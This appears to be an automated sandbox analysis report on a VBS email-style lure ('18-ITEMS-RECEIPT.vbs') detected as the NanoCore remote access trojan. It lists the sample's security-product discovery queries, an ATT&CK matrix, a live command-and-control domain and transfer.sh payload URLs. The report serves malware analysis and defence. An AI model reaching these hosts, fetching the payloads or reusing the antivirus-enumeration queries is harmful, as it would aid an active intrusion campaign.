Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: aspnet_compiler.exe, 00000019.00000003.448855148.0000000000BBE000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection211Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter11Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting221Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection211NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting221LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
newjan.duckdns.org
194.147.140.20
truetrue
    unknown
    transfer.sh
    144.76.136.153
    truefalse
      high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://transfer.sh/K5k7xj/HSJDUIF.txtfalse
        high
        https://transfer.sh/ucAlHz/FGTEFR.txtfalse
          high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://transfer.shpowershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpfalse
            high
            https://transfer.sh/K5k7xj/HSJDUIF.txt0powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.424071374.000001E0B32D1000.00000004.00000001.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpfalse
                    high
                    https://transfer.sh/ucAlHz/FGTEFR.txt0powershell.exe, 00000003.00000002.426813843.000001E0B34DC000.00000004.00000001.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          144.76.136.153
                          transfer.shGermany
                          24940HETZNER-ASDEfalse
                          194.147.140.20
                          newjan.duckdns.orgunknown
                          47285PTPEUtrue

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:483363
                          Start date:14.09.2021
                          Start time:21:31:01
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 9m 14s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:18-ITEMS-RECEIPT.vbs
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:36
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winVBS@10/11@23/3
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .vbs
                          • Override analysis time to 240s for JS/VBS files not yet terminated
                          Warnings:
                          Show All
                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.79.90.110, 20.50.102.62, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154, 20.54.110.249
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483363/sample/18-ITEMS-RECEIPT.vbs

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          21:32:16API Interceptor24x Sleep call for process: powershell.exe modified
